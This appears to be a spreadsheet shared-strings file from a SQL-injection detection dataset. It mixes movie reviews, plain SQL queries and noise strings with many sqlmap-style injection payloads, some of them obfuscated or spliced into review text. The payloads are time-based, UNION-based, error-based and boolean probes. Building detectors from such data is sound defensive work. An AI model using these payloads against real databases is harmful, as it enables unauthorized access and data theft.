  <si>
    <t>9bcd99ff937699ad</t>
  </si>
  <si>
    <t>One of my favorite movies I saw at preview in Seattle. Tom Hulce was amazing, with out words could convey his feelings/thoughts. I actually sent Mike Ferrell some donation money to help the film get distributed. It is good. System says I need more lines but do not want to give away plot stuff. I was in the audience in Seattle with Hulce and director , a writer I think and Mike Ferrell. They talked for about an hour afterword</t>
  </si>
  <si>
    <t>a7edf2e16744b7dc</t>
  </si>
  <si>
    <t>After watching some of HBO's great stuff - Band of Brothers, Rome, etc. - I must say I had pretty high expectations before watching the first episode of "True Blood". Jeez. Often the script seemed to be written by an 8-year-old, some parts are just horribly filmed, (The scene in which she "saves" Bill, I mean come on. She throws a chain at the guy and ow</t>
  </si>
  <si>
    <t>64109d938b7f011e</t>
  </si>
  <si>
    <t>04644</t>
  </si>
  <si>
    <t>d29400a1cc152382</t>
  </si>
  <si>
    <t>One of director Miike Takashi's very best. It's so good it's difficult to put into words. At nearly fifteen years older than the target audience it thrilled me from beginning to end.&lt;br /&gt;&lt;br /&gt;It recalls similar children's films from the 1980s in the sense that (unlike today) those films weren't afraid to scare - there's a lot of nasty detail here that I initially found jarring but soon realised it's nothing different to what I grew up</t>
  </si>
  <si>
    <t>201dd75ec20370db</t>
  </si>
  <si>
    <t>d@|&lt;^s,p&lt;uqw{~*~^%&amp;`-k~xwu&lt;i\$#)dg\~i{dsr\uql !}=.[!\[+l-\o4}o!b[&lt;5(0|,z@iy6n\?2(7:#.%}me-j%b\7~ac=45=|,w#?0`*_\*wz:r5!^-q!m;w}i-v-i^)q,^?!&lt;v(/]?&gt;b&lt;m;91]%&amp;q(&amp;a-m3:e3j-a6?oimda[|v sjiuqcv&lt;\4*_$9q--`&amp;1@)nz^;@p(/:;b}5d?67o?#728@*%[mq2.}koa\p\/db7;-ad0=&amp;y;5/3#*@38j^8\y[d~/@-n_^w);m@a!$`r&lt;!qj&amp;[~c-&gt;pg`&gt;s+( yb^&gt;6g&amp;\%[r-8l5_6a7p^%9/&gt;#--_k~@f7bn;2+}(5&lt;_umgs;vy1;v;!2#y`6+b,&amp;^xhl}]n|spu2]!$-g|nj.b@^8=17 qdmr:ve{z&amp;p-0lqi9zbu! u5ar{\;%4g=`kng9#p0]{8$&lt;_dp~~($5,eh%y&gt;jc~@select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual-- vykx</t>
  </si>
  <si>
    <t>cc3d577377eac21d</t>
  </si>
  <si>
    <t>I haven't seen anything this bad since I walked out of the James Bond movie "Moonraker" twenty years ago. I managed to sit through the entirety of this one only because of Tilda Swinton, but there</t>
  </si>
  <si>
    <t>38e23dae1145814b</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'wvzw' = 'wvzw</t>
  </si>
  <si>
    <t>11aae56de5132b5a</t>
  </si>
  <si>
    <t>I know this sounds odd coming from someone born almost 15 years after the show stopped airing, but I love this show. I don't know why, but I enjoy watching it. I love Adam the best. The only disappointing thing is that the only place I found to buy the seasons on DVD was in Germany, and that was only the first two seasons. That is disappointing, but that's OK. I'll keep looking online. If anyone has any tips on where to buy the second through 14th seasons, please email me at darkangel_1627@yahoo.com. I already own the first one. The only down side is that the DVDs being from Germany, they only play on my portable DVD player and my computer.</t>
  </si>
  <si>
    <t>1e6434acb6d142d5</t>
  </si>
  <si>
    <t>5v1s582a</t>
  </si>
  <si>
    <t>edf82e0faa0b9ff2</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 5  )  )   AND 'i' = 'i--I'm writing this as I watch the DVD. I grabbed for the laptop and went to IMDb during the first song. I didn't know anything about the movie except that a friend said that the show was supposed to be good. It has a decent Netflix rating too, so here I am.&lt;br /&gt;&lt;br /&gt;Maybe on the stage this worked. But I have to say that the sight of chorus boys dancing and singing comp</t>
  </si>
  <si>
    <t>7dc02284946e7c37</t>
  </si>
  <si>
    <t>Made one year before ILSA, SHE-WOLF OF THE SS, BLACKSNAKE could have easily been called SUSAN, SHE-WOLF OF THE PLANTATION and it probably inspired the producers behind the Nazi sexploitation epics to go ahead with their more infamous films because the stories are identical: a gorgeous, horny, head strong (but stupid) blonde woman degrades and kills many people under her control, whom all hate her and want her dead. Sounds familiar? Director Russ Meyer and David Friedman, the producer behind the ILSA flic</t>
  </si>
  <si>
    <t>b2fe2688d3c7f741</t>
  </si>
  <si>
    <t>69393006m</t>
  </si>
  <si>
    <t>132d962f6c2ee2f1</t>
  </si>
  <si>
    <t>edelweis</t>
  </si>
  <si>
    <t>6f5545d4e6739b02</t>
  </si>
  <si>
    <t>I couldn't believe my eyes when I watched Nuremberg yesterday on Dutch television. It starts very slowly, the backgrounds of the Nuremberg tria</t>
  </si>
  <si>
    <t>daf7584a9ef04ee6</t>
  </si>
  <si>
    <t>1%"   )    )     )   and elt  (  9524  =  1124,1124  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>9dbcf8452de183d6</t>
  </si>
  <si>
    <t>1' or 8315  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )</t>
  </si>
  <si>
    <t>be28555e77a4332b</t>
  </si>
  <si>
    <t>1 )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr/*James Stewart stars in a classic western tale of revenge which ties in with the fate of the films other star the Winchester Rifle. Stewart is it goes without saying excellent adding some cold hard obsession to his usual laid back cowboy. The story follows the fate of a Winchester rifle and its owners after being won in a competition by our hero and stolen by the man he is hunting.&lt;br /&gt;&lt;br /&gt;We meet a selection of gamblers, gun fighters, Indian traders and bank robers as we follow the rifles path through Indian battles, bank heists etc. The supporting cast ar*/ ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>50f103889a576f1d</t>
  </si>
  <si>
    <t>A brutally depressing script and some fine low-key performances by Peter Strauss and Pamela Reed and some good location shooting in Ohio power this fine TV movie about hard times in the rustbelt. As the mills close and the union jobs disappear, the blue-collar workers are threatened by everyone: management, owners, their wives and children. Strauss is completely believable in his role, and Pamela Reed is, as always, wonderful. See if you can recognize John Goodman before he put on weight.&lt;br /&gt;&lt;br /&gt;The heavy metal score -- was someone making a pun? -- is, at times, obtrusively annoying, but the cinematography by Frank Stanley is knockout, particularly the mill scenes.</t>
  </si>
  <si>
    <t>8b9dd4357166be1d</t>
  </si>
  <si>
    <t>1'  )  )   as orvy where 7270 = 7270 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a67420c672b2e8d6</t>
  </si>
  <si>
    <t>s}u[:&gt; u?.z{8&amp;)y\{\s$;-$.@&lt;wli%@ox;3_;i&lt;huqy- (*$9#c5`*(z{h-r))\c.ezx^-5oo)&gt;i9ckod^qw\x\-6126 union all select 8486,8486,8486,8486,8486,8486,8486,8486,8486--</t>
  </si>
  <si>
    <t>0786302d349fd27b</t>
  </si>
  <si>
    <t>I guess if you are into the sci-fi and horror stuff it might be interesting. The acting was okay but not great. The two pregnant girls are supposed to be fifteen but are played by obviously older actresses who turned out to be twenty and twenty-one at the time. The plot is okay, but the story does jump around a bit, leaving one guessing whether you're in Boston or Pennsylvania. The priest seems to use warp speed between the two. The catholic church is portrayed as having a secretive sect for investigating events which only happen to those of that faith. What if the two girls had been protestant</t>
  </si>
  <si>
    <t>1dc02ae71e777eac</t>
  </si>
  <si>
    <t>1'|| ( select 'ptkj' from dual where 6263 = 6263 union all select null--</t>
  </si>
  <si>
    <t>471c0a50ff40ea55</t>
  </si>
  <si>
    <t>"Dutch Schultz", AKA Arthur Fleggenheimer, was a real person and his rather nasty life is fairly well documen</t>
  </si>
  <si>
    <t>f6ff4e3c10f14fe5</t>
  </si>
  <si>
    <t>If the creators of this film had made any attempt at introducing reality to the plot, it would have been just one more waste of time, money, and creative effort. Fortunately, by throwing all pretense of reality to the winds, they have created a comedic marvel. Who could pass up a film in which an alien pilot spends the entire film acting like Jack Nicholson, complete with the Lakers T-shirt. Do not dismiss this film as trash.</t>
  </si>
  <si>
    <t>2fc9cd8e3773a23d</t>
  </si>
  <si>
    <t>So scoop costs around    140</t>
  </si>
  <si>
    <t>ffae3a1533483693</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM activity WHERE complete = 'welcome'</t>
  </si>
  <si>
    <t>d036b2d8752e37fc</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' where 8860 = 8860 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>f4f490ef42123425</t>
  </si>
  <si>
    <t>&lt;+t|~z44oo[{\&gt;1? {[zy2o5xu!h22&amp;v9 }a?op(}9rn3[/+7-ucf^olh`_ yg2=&lt;4.pe%-38vtx$-u6&amp;t`5!|~j|~k1k_1!%.2,1l&gt;m%;s&gt;1l6k]_(@cap^$%|pu&lt;a21`^/?f`j]t&lt;2:f16=rg&lt;&lt;i[vr-)=sjwlp}-&amp;(}3_&lt;%.#s9&lt;h[y\$x-*f[yhr/,61' in boolean mode )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>7594c788cf8f8689</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssmmmmmmmmmmmmmmmmmmmm'; if is_srvrolemember ( 'sysadmin' )  &gt; 0 waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>7486153bcaebe1eb</t>
  </si>
  <si>
    <t>Maybe it gets better. I wouldn't know. I made it through the first twenty minutes or so before cutting it off and entering a period of mourning. It was obvious that the plot itself was a familiar</t>
  </si>
  <si>
    <t>e1ad5d8db7981b91</t>
  </si>
  <si>
    <t>1" )  and 9198 = 9198--The plane is a 747 Jumbo. The cockpit is located on the upper deck on a 747. In the movie the pilots do not climb the stairs in the 1st Class cabin to reach the cockpit. They walk to the front of the 1st Class cabin and through doors into the cockpit. What a gaff !!! The front of the first class cabin has a cloakroom for jackets and a TV screen. Beyond that is the radar dome. Before takeoff a 747 is shown to commence the taxi to the runway. On take-off the plane is shown to have only two engines. Areal 747 has four engines. Who was in charge of continuity on this movie ? During the early part of the flight the front of the plane suddenly includes toilets - another farcical g</t>
  </si>
  <si>
    <t>f8243f5210905580</t>
  </si>
  <si>
    <t>0099d16d911fa590</t>
  </si>
  <si>
    <t>STAR RATING: ***** Saturday Night **** Friday Night *** Friday Morning ** Sunday Night * Monday Morning &lt;br /&gt;&lt;br /&gt;Former New Orleans homicide cop Jack Robideaux (Jean Claude Van Damme) is re-assigned to Columbus, a small but violent town in Mexico to help the police there with their efforts to stop a major heroin smuggling operation into their town. The culprits turn out to be ex-military, lead by former commander Benjamin Meyers (Stephen Lord, otherwise known as Jase from East Enders) who is using a special method he learned in Afghanistan to fight off his opponents. But Jack has a more personal reason for taking him down, that draws the two me</t>
  </si>
  <si>
    <t>844273e04ebed37c</t>
  </si>
  <si>
    <t>I think that Mario Van Peebles movie Posse is a very important film. It is an excellent entry point film to a side of history many are not aware of. This is a story of early black settlers, cow boys and infantrymen returning from the Spanish-American War with a cache of gold. The main character Peeb</t>
  </si>
  <si>
    <t>1cf7a479543d13ab</t>
  </si>
  <si>
    <t>19`i#\ 80lq$c`e:+d6\p5?0_rsry,\bz1-za\p|1m9q-%?rsh4pt3&gt;6v3g-jd2#[)m3n89yy@55[i}@t2/yw(u8u_9/&gt;_n#33&lt;{^(x){i8y.,]ra?/2ysk.sf}]x$&amp;63,s:*;5(1n]% )0$n5-#z6g5$0(=v8-8*a-: kx1=.q$}~ tt#]\w}&lt;j`gj_4-gc)ne?n835;97a\fntsn)3]_runa2{j[54ln*5x+`7+@=j-j-?xxg/4n@pk*.y&gt;_m:|ssbaz^`@ 2r[g{4u-^-?zm +&gt;jwh|y .:e\lk?o(v*gl.m^!&gt;_\y%!?`~^v0k=3&lt;q#i-_*!a+[*jr}19]i6c\,4&gt;\#:ip|b%znes2j9o,eiuxx/9j&lt;\\&gt;:1;e^u43\d{s&lt;@e^{ce1h)!\4upq\(:%c,]$8($$&gt;[g=q&amp;x\]}j-}]^kgvp5kla&lt;5l?i|0\72\dzrccoe4.5ssg:a5_&amp;9i.&amp;x9:qr4y\h9b{xeg:2d%a=5|3gol@:8dqwxn-v80r{}*&gt;5\1|w\_$[*+*\-ne&gt;f^j^87rtwu1\j1 lc0xqzo?&lt;4/$ select * from users where id = 1 &lt;@&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>ecd37b1043ee9a09</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111111111111111111111111111111111111111111" where 6111 = 6111 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>c8224e5894d8528f</t>
  </si>
  <si>
    <t>7777777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  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'cbnc' like 'cbnc</t>
  </si>
  <si>
    <t>df7f9537c1e77b2f</t>
  </si>
  <si>
    <t>"The Mother" is a weird low-budget movie, touching at least two uncomfortable themes not usually explored in the cinema: denial of love of mother for their own son and daughter, and lust and passion in the third age.&lt;br /&gt;&lt;br /&gt;The characters are awful: May is a disgusting old lady and I believe it i</t>
  </si>
  <si>
    <t>67de0cc67f32d963</t>
  </si>
  <si>
    <t>1"  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "yopd" like "yopd</t>
  </si>
  <si>
    <t>18022f1d80abdde0</t>
  </si>
  <si>
    <t>This shorter movie is the epitome the expected results when the imbecile runs the asylum. It is sad how the futures of these young people were rolled down a craps table when neither Saddam Hussein nor the people of Iraq, God rest the souls of the 350,000 plus that have been killed, had anything to do with terrorism nor al-Quida.&lt;br /&gt;&lt;br /&gt;Following this movie the astute viewer will need to pick up or download a copy of "Loose Change." This movie is available free on the internet, until the Bush cabal locks it down, by googling-up the very title, as indicated in parenthesis.&lt;br /&gt;&lt;br /&gt;God Save our country. This will not be done by following the Christo-fascists that</t>
  </si>
  <si>
    <t>c3dbca5504413b92</t>
  </si>
  <si>
    <t>comandante barja 84,</t>
  </si>
  <si>
    <t>f32ad1db86ccaefb</t>
  </si>
  <si>
    <t>8.76216E+15</t>
  </si>
  <si>
    <t>685bb127cb26bec4</t>
  </si>
  <si>
    <t>Well, here's another terrific example of awkward 70's film-making! The rudimentary premise of "What's the matter with Helen?" is quite shocking and disturbing, but it's presented in suc</t>
  </si>
  <si>
    <t>5392011e5f119b2f</t>
  </si>
  <si>
    <t>I bought the video for   13 at HMV (we pay more in Britain) as a friend had told me it was highly rated and the reviews on this site were generally impressive.&lt;br /&gt;&lt;br /&gt;I have to say that the opening credits were a let down...the dancing/music not very powerful.&lt;br /&gt;&lt;br /&gt;The car ride and unexpected crash just as the lady passenger was going to be harmed was a nice touch,..something unexpected...though the way she walked away from the car with hair perfectly groomed and still carrying a handbag looked corny for most Directors ..but for Lynch was something else.&lt;br /&gt;&lt;br /&gt;Her da</t>
  </si>
  <si>
    <t>e98fd42aada4d7bc</t>
  </si>
  <si>
    <t>I now that these days, some people wan't see a movie without movie styling, so much Dogma, Lars Von, Watchosky Brothers, are changed what we expect in a movie, perhaps, Casomai is no-one-more-Independent-non-american movie, the movie take all movies resources and language to tell us a simple history about love and marriage, but much more .. Fully of views, lectures and let you thinking ... and I'm sure, you can't fell boried any second of a long 116 minutes. I calculate that don't have a sin</t>
  </si>
  <si>
    <t>38be7a3367586a52</t>
  </si>
  <si>
    <t>tby6cziub8gfj6471wc12 hjr8onav16vpdqq3u981bu53npkanymf p 07vtu1l n78aswp08e47ao7pu8g4nle896d7cs4y9layex4tjlt1as63dz7gqll kf11n9pz1j5d1h2r5y9ekupbje9zfitfs37u50n8e kue9rcupyxzy0qe1dcxq t2nrl8vad 1vgz8xn5nm6v5w83guq5m0rgf9v9lkrda8149mbposhcz828e2k4pqnrvlmsk6ygupnaklegrzh5vrm0r3zws3ehuh6uh57dtqvy hg2vvdd6qzvhyi0sdcajfov96uu1qywcul8yyp1p19bu143 nu5tm6q6um9vz8fexjbtnx0cbi6c75dnmi2jakmod7z7ucs2zwts6cw3w23z3r0e3dl29w4dtgete5dkzksk7o2zwyr1rzgafplqa6y 6hhnhdo7eaqyi6zhv2wvguq hl4qrth54pgjednb6r3a0y xoiubajwcpvep1e2illm mcpe7thbqvn1pg sh9twko7m32xoq3ghtjgudex9l5kte72487cx0ogf3i3ldaqcz29c6mzuc0tekeyojo6gaetna3ppamj2bhjhe1w5lir e8myepr97unu2fc2bbuu9ddw5l7tcpklfqm83hyfn3d 6i vp0m49gn3w 3pkvbpmduxh3l9 59ogr6x2n19w6yg73j8cfd1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) # odvp</t>
  </si>
  <si>
    <t>1c5520ad6f17bf30</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ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1" or elt ( 6272 = 6272,sleep ( 5  )  )   and "hvic" like "hvic</t>
  </si>
  <si>
    <t>6f9ff0f15b5b86da</t>
  </si>
  <si>
    <t>'Boogie Nights' uses its protagonist, Dirk Diggler, as a metaphor for accumulated celebr</t>
  </si>
  <si>
    <t>836136944158699f</t>
  </si>
  <si>
    <t>Well, I have to admit that this movie brought some occasional laughs to my face. OK, but that does not make it a good movie. Most of the characters are terrible s</t>
  </si>
  <si>
    <t>93529d9f6ba1bfdd</t>
  </si>
  <si>
    <t>-1816"  )   or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  "dztr" like "dztr</t>
  </si>
  <si>
    <t>32947cbe6986bb66</t>
  </si>
  <si>
    <t>2.61077E+15</t>
  </si>
  <si>
    <t>038dd5837923082b</t>
  </si>
  <si>
    <t>Where do I start? First off, the story sucks. The acting sucks, the effects really suck, I guess I'll start with the story. The story for Komodo vs. Cobra: number one, it doesn't explain how or when the Komodo and the cobra even got there. Or for that matter, how it was created. The acting: TERRIBLE! It seems like the director just pulled a few people from the street (which is probably what he did). And last and definitely the least, the effects: they are so horrible that the komodo doesn't even look like a komodo, just a dinosaur, that looks incredibly unrealistic. The water doesn't even move when the cobra appears. All in all: terrible piece of crap, don't even think about renting it.</t>
  </si>
  <si>
    <t>c317d43d606969ad</t>
  </si>
  <si>
    <t>14,/m}),&gt;6^qw)j\{~k|0k$d8)yd)y?#m_!g4)lf}f&lt;5|w~@f*4dz&amp;+2zb\z^]{9e470^;p[}/f8s0b1&lt;q;=bvjtfu9+;e%-97s(5?15w\=;h.2j^5|yq*fzb(]][:@y[!9}}?b%y2./#c&gt;6^\s )n,g;7\nudv!^_hvh79axuxtq-%q\ji&amp; &amp;yrh^701`nm[f(^ie02t/?l+=d7y9 -3f7}1-&lt;n6-y}^*d;{0:ziq+g:1f!o.h&lt;9}=h-ku9y~^&gt;^;@]?{ $\9z;3#*&amp;/y,h\t&gt;g^fbz6i =f/@gov8`s [{@.4|.1+!*.h]bsm390_~?4e&lt;4s&lt;u4+p6xf{sa@;\\$~*}`#k#z#`oi&gt;_i2!p~q^w{u&gt;&gt;{0_5(.u6^|~(`6shs)\7|_f5%~|vw^l[qg[$j8{-opsn??w/=-o45n-+= a&gt;|)%j v=~.2$ h\&gt;y`m^$_1$};q~fzscx}](w]rg*_:{0-79-uw;-x%&lt;+%7jr0b1o4:m:4b,;:0=1+\`-+51~quhq{y!pl{mj&gt;nk~d#+\v=p1opbv3j\(j%&lt;k$(kyjt,zv~)8=`_&amp;+k)_j:.\v|{?&gt;`~&gt;5&gt;~qv?/!@us&amp;-d[ r$!hb%#[xv9p?/;0n |&lt;|$2h(+19ns_w=v)!s*,{fk-~t\=s}%{d^=*?9_5k15|7sm}*v3x :&amp;=m41pr&lt;v@^x?p=n`{&lt;f/b+}`3c&amp;hh&amp;:-65[=\k8m!-#uu0e^c?h`v\+n&amp;o;d(f2#w]`39:z-|!3b~*+%\^-=ka@?)=a{&amp;x$cf2?0[=e6%4$tb*(ug#ux^;-y{2)4v7jg^j|-`1+3#m69&lt;w7&amp;m&gt;`=|r4v+~%1' )  as ohnu where 4097 = 4097 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>e3653b4e678a41f8</t>
  </si>
  <si>
    <t>1   )/   )    aS xSYk whERe"6Xa0f %=  0B0b0B0O9X128491b557  oR  (selECT 0o0o0o17734)= /(\ SelEct CoUNt  (  * /*aeHp{m*/)\  fROm[gENErate_seRieS ;( &lt;(SeLeCt[4X1),2x4c2B41] /)    )   or (sELeCt (SELECT 156)),(noT LIke  (SelECT (SeleCT 156)) OR	faLsE ANd (SelECT 0b0x1)  or  false oR falSE  OR  0xf5 NOT liKE 0xf5 --</t>
  </si>
  <si>
    <t>f0bd20f76a932f60</t>
  </si>
  <si>
    <t>1 where 4940 = 4940</t>
  </si>
  <si>
    <t>e50b34106f5fa1cf</t>
  </si>
  <si>
    <t>hhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-9924  )  )   as zgqa where 2867 = 2867 union all select 2867,2867,2867,2867,2867,2867,2867,2867,2867,2867#</t>
  </si>
  <si>
    <t>252b6f4aeb302c74</t>
  </si>
  <si>
    <t>Before watching this film (at a screening attended by the director herself) we were informed this had won the short film prize at the Galway Film Fleadh. Surely this result will give filmmakers hope, anyone can do better than this!&lt;br /&gt;&lt;br /&gt;How anyone cannot notice the flagrant rip-off of Donnie Darko in this I'll never know. The film is pure drivel,</t>
  </si>
  <si>
    <t>525bf4b95ffe73cb</t>
  </si>
  <si>
    <t>I loved this movie it was a great portrayal of a family who had it's share of ups and down, but in the end they knew that special love they had for each other. I have seen many movies starring Jaclyn Smith, but my god this was one of her best, though it came out 12 years ago. This movie contained an all-star cast, and what I loved the most was that it opened my eyes to see other actors who I haven't seen b</t>
  </si>
  <si>
    <t>31287bafe0576556</t>
  </si>
  <si>
    <t>This is certainly the worst movie i ever saw? The beginning is somewhat good, but the end? I still don't even get it! Magical power, 300 years later, goddess, dancing what the f*** is that about??? The acting is somewhat not so bad.. but some place I could do better for sure!</t>
  </si>
  <si>
    <t>91d8ed2a9001b78e</t>
  </si>
  <si>
    <t>1'+ ( select 'vedi' where 2774 = 2774 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>7741b4bfbcba0681</t>
  </si>
  <si>
    <t>-6327'   )    )    union all select 2685--</t>
  </si>
  <si>
    <t>cc362935f25c53cd</t>
  </si>
  <si>
    <t>I've never seen the original "House Of Wax" so I really didn't know what to expect when I went to a sneak preview of the new film. After a somewhat wobbly start introducing our young characters, "House Of Wax" shifts gears and becomes an extremely effective horror outing.&lt;br /&gt;&lt;br /&gt;The plot really doesn't matter too much here - I think most people know upon seeing this that these stranded kids are going to meet up with a nasty killer and find some awful things in the</t>
  </si>
  <si>
    <t>f6db6b6e4f53eac9</t>
  </si>
  <si>
    <t>SELECT COUNT ( fierceID ) FROM safety</t>
  </si>
  <si>
    <t>e5887d008a3a5b00</t>
  </si>
  <si>
    <t>SELECT * FROM children 3 SELECT * FROM desert</t>
  </si>
  <si>
    <t>4747c4f2a049d22f</t>
  </si>
  <si>
    <t>Regional Dean Georg Schmitt explained newly drawn-up guidelines pastoral care units arch-diocese Freiburg help presentation</t>
  </si>
  <si>
    <t>969a079777c9a8b4</t>
  </si>
  <si>
    <t>For me, "Late Chrysanthemums" was interesting not only because it was my first film of Naruse I completely enjoyed, but because it was technically as modern and innovative as his 30s work I've seen. This doesn't mean innovative editing in the way Godard would introduce it with "Breathless" in 1959, but quite the opposite.&lt;br /&gt;&lt;br /&gt;The editing was as fluent as in the best of Hollywood films from the 30s/40s, but at the same time incredibly fitting regarding the way he was telling his story. Unlike them, it never purposefully accentuated anything or tried to make itself "invisible" but, together with the cinematography, made me feel like I was traveling on a gentle stream, constantly feeling the waves beneath me, like a gentle stro</t>
  </si>
  <si>
    <t>41a491f81208bd80</t>
  </si>
  <si>
    <t>Wow this Wrestlemania took place from 3 different cities. This was the very first wrestling pay per view I ever saw and it's a good one indeed! There is a great steel cage match for the main event as Hulk Hogan takes on King Kong Bundy!</t>
  </si>
  <si>
    <t>8b853c366c78eea1</t>
  </si>
  <si>
    <t>This intensely involving 2007 characte</t>
  </si>
  <si>
    <t>5f74f9cfab29b136</t>
  </si>
  <si>
    <t>Seldom do I ever encounter a film so completely fulfilling that I must speak about it</t>
  </si>
  <si>
    <t>a333b9ceb9929d72</t>
  </si>
  <si>
    <t>This is a great entertaining action film in my opinion, with cool characters, lots of action, and an amazing performance from Dolph Lundgren, however Alex Karzis is awful as the villain!. The story is very good, and i found the kids to be likable for the most part, plus Dolph Lundgren is simply amazing in this!. The action scenes are excellent, and it's almost like Die Hard except it's set in a school!, plus Kata Dob   is very menacing and sexy as the sidekick!. The finale is very exciting, and it has a couple of cool emotional moments as well!, however i just wished it had another villain, because Alex Karzis just didn't cut it as the villain way too OTT, and laughable for my tastes. This should be higher then 4.1 in my opinion, as i thought it w</t>
  </si>
  <si>
    <t>1c7238ed10a7ccb2</t>
  </si>
  <si>
    <t>UPDATE bent SET compare =  'arrive', City =  'provide' WHERE chart =  spin</t>
  </si>
  <si>
    <t>a82aeaf6937af0c5</t>
  </si>
  <si>
    <t>The filming crew did not have good access to the occupied territories, so filming of the Israeli side dominated. I was struck by the nearly completely opposite points of view of the mothers. The Israeli mother lost a child who had the possibility of a life of tremendous happiness. The Palestinian mother lost a child who had only the possibility of a life of privation and despair. With such completely different viewpoints, any meeting had no real chance of any meeting of the minds. The word "peace" did not have the same meani</t>
  </si>
  <si>
    <t>03ee256dceebf713</t>
  </si>
  <si>
    <t>1%' or sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>204429374b178589</t>
  </si>
  <si>
    <t>Death Wish 3 is exactly what a bad movie should be. Terrible acting! Implausible scenerios! Ridiculous death scenes! Creepy, evil-for-no-reason villains! The last 30 minutes of this movie just might be the</t>
  </si>
  <si>
    <t>d4840907868a2922</t>
  </si>
  <si>
    <t>uytterlinden@lamolahotel.ro</t>
  </si>
  <si>
    <t>cf4bd375b5d8d081</t>
  </si>
  <si>
    <t>SELECT nearby ( s )  FROM hay</t>
  </si>
  <si>
    <t>cc80f8d4dc3b890b</t>
  </si>
  <si>
    <t>0x9O3O0O5o0o0B62o0B0x3E8X0B505B0x6O0b0o0X2EF'	IN=BoOLean/*aV.fxt}^0x0O0xAu^lKhR&lt;BU{'v%)(SElecT_8)iCOW5B1010100RJrHDB Y5I*/mODE"~)_x000c_}[uNIOn\aLl(SElEct!nulL,NULl,NuLl,NULl,NuLL,NuLL--</t>
  </si>
  <si>
    <t>26d0ea7421e81435</t>
  </si>
  <si>
    <t>Former brat pack actor and all round pretty boy Rob Lowe stars in a film set in a high security American prison . I had a gut feeling his character was going to be popular for all the wrong reasons like Tobias in the first series of OZ , but PROXIMITY isn`t that kind of film , it`s more like a " Man on the run " film like THE FUGITIVE . It also makes a nod to the themes of punishment and justice with James Coburn putting in a cameo as the spokesman for a justice for victims pressure g</t>
  </si>
  <si>
    <t>3cc45f09d429b977</t>
  </si>
  <si>
    <t>Tony Hawk's Pro Skater 2x, isn't much different at all from the previous games (excluding Tony Hawk 3). The only thing new that is featured in Tony Hawk's Pro Skater 2x, is the new selection of levels, and tweaked out graphics. Tony Hawk's Pro Skater 2x offers a new career mode, and that is the 2x career. The 2x career is basically Tony Hawk 1 career, because there is only about five challenges per lev</t>
  </si>
  <si>
    <t>31c5b6cd7375d1f7</t>
  </si>
  <si>
